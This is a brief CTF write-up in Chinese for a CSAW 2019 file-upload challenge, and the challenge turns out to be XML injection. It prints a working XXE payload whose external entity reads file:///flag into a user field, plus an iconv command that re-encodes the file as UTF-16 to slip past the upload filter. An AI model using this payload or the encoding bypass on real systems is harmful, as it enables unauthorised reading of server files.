文件上传题,看一下给的例子。
是xml注入
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
直接传好像不行,看wp转成utf-16的编码了
iconv -f utf8 -t utf-16 1.xml>2.xml